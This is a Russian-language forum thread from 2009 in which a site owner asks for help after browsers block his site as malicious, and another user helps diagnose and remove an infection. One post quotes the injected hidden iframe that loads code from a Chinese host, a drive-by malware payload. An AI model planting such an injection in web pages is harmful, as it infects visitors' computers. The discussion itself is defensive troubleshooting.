Версия для печати темы

Автор: avante 9.4.2009, 16:07

Ребята, кто шарит во всей этой электронной мути, подскажите. Захожу на свой сайт хххххххххх, а мне там вылазиет вот такая фигня:

Имеется информация, что этот сайт атакует компьютеры
Имеется информация о том, что сайт хххххххххх используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.
Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.

Причем у сайта два доменных имени, захожу на второе имя уууууууууууу, там все нормально. Что может быть и как победить сей недуг? Катавасия длится уже с месяц. Мой друган скачал весь сайт, проверил антивиром, чтото там нашел и удалил, удалил с сервака оригинал и залил сайт обратно. Ничего не изменилось. Так и вылазиет это сообщение о блокировке. А по имени уууууууууу ведь все нормально заходит, даже когда там реально какойто вирус был. Вообщем, мне надо чтоб люди могли заходить на сайт хххххххххххх. Кто чем может помоч???

Автор: avante 9.4.2009, 16:16

Если кто по доброте душевной сможет решить проблему, скину в личку первое (проблемное) и второе (нормальное) доменные имена.

Автор: FildSnild 9.4.2009, 16:31

Эмм.. может, какая то шняга индексировала сайт xxxxxx в список "неблагонадежных", тем более что там вирь был? Пришли в личку имена, я попробую.

Автор: avante 9.4.2009, 16:43

FildSnild отправил, спасибо

Автор: LadyPurple 9.4.2009, 17:22

Блин, ледиперпл тут залогинилась уже. Сейчас посмотрю.

Автор: FildSnild 9.4.2009, 17:37

Вот он у тебя сидит в коде:
<iframe src="http://internetnamestore.cn/in.cgi?income27" width=1 height=1 style="visibility: hidden">

Автор: avante 9.4.2009, 17:43

FildSnild спасибо еще раз, отдал твои исследования челу, который хоть чтото в этом смыслит, сидит разбирается

Автор: avante 9.4.2009, 17:47

Чел мне сказал что уже удалял эту фигню, откуда опять появилась, неизвестно. Еще раз удалил.

Автор: FildSnild 9.4.2009, 17:59

В хостере дырка значит. Или права доступа неправильно стоят.
Тут кой чего есть:
http://dataword.info/virus-alert.php
может попробовать пароль сменить. А сайтик с вирем - китайский.

Автор: avante 9.4.2009, 18:06

Каков тогда выход из положения?

Автор: avante 9.4.2009, 18:07

Щас ссылочку твою почитаем

Автор: avante 9.4.2009, 18:26

заходим через мазила фиерфокс, есть вирус, заходим через эксплоер нет вируса, шайтан

Автор: FildSnild 9.4.2009, 19:10

avante
Не, не так. Вирус есть в обоих случаях. Просто когда заходишь через експлорер, вирь юзает дырку в нем, и ты его не видишь (а комп уже заражен). В мазиле и опере таких дырок нету, поэтому предлагает скачать файл.
Какой выход из положения я не знаю, попробуй пароль поменять к сайту. Судя по описанию, вирь пароль уже украл от твоего ресурса, и теперь через ftpшник закачивает код в индекс.хтмл.

Автор: avante 13.4.2009, 6:13

Вообщем проблему не победил , удаляем тот вирус, удаляем с сервака старый сайт, заливаем новый-вылеченный, а он тут же выдает что сайт заблакирован и в коде опять сидит вирь , тут же сразуже че за фигня?? пароль сменили. Есть еще у кого какие мысли ?????

Автор: FildSnild 13.4.2009, 8:04

avante
Написал знакомому из лаборатории Касперского, думаю поможет.

Автор: FildSnild 13.4.2009, 14:06

Вот ответ Касперский лаб, как я и предполагал с паролем:

Автор: avante 14.4.2009, 10:21

Ого, спасибо, уже тяжелую артиллерию подключили, будем разбираться, о результатах отпишусь

Автор: avante 15.4.2009, 14:52

Отчитываюсь: владелец сервака проверил свой сервер, нашли какуюто фигню каторая штмл код правит, но к моему сайту это не относилось. На том компе, на котором проверяют и перезаливают мой сайт стоит нод32 лицензионный новый, сам комп не заражон, а вот на сайте опять удаляют тот же вирь что был и до этого (который уже не однократно удаляли) пароли сменили. Как уверяет владелец сервера, на моем сайте чисто, а вот гугл занес мой сайт в черный список и теперь фиг знает сколько он будет в этом списке. Как сообщить в гугл чтоб они мой сайт из списка удалили? знает ктонибудь?

Автор: FildSnild 15.4.2009, 15:13

Мм.. ну вот сейчас я на него залез - враждебного кода нет, все открывается. Насчет гугля не знаю.

Автор: avante 15.4.2009, 17:55

FildSnild тоесть сайт открывается нормально? без предупреждения о заразности сайта? я вот пробую зайти, он мне окошко о блокировке выдает, шайтан

Автор: FildSnild 15.4.2009, 20:15

Автор: avante 16.4.2009, 3:52

Автор: avante 19.4.2009, 18:38

Урааааа, мы победили не только 9 мая, но и буквально на днях. Благодаря FildSnild и еще нескольким моим друзьям, мы таки победили заразу, терроризирующую мой сайт около 2-х месяцев. Наконецто все заработало.
FildSnild спасибо тебе, твои наводки очень помогли.

Автор: FildSnild 19.4.2009, 19:10

Ура! Незачто )